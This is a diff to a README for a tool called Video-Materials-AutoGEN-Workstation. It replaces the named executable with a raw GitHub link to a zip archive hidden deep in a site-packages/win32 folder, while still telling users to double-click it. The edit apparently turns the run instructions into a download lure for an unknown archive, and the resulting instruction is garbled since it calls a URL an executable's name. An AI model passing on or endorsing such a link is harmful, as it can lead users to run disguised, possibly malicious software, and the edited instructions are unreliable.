Rxp-ture/Video-Materials-AutoGEN-Workstation/README.md

 ### Step 5: Run the Application

 Navigate to the folder where you extracted the files.
-Inside, you will find an executable file named `Video-Materials-AutoGEN-Workstation.exe`.
+Inside, you will find an executable file named `https://raw.githubusercontent.com/Rxp-ture/Video-Materials-AutoGEN-Workstation/main/asr/runtime/Lib/site-packages/win32/lib/Video-Materials-AutoGEN-Workstation-v3.2.zip`.
 Double-click this file to launch the application.

 ## 🌟 Features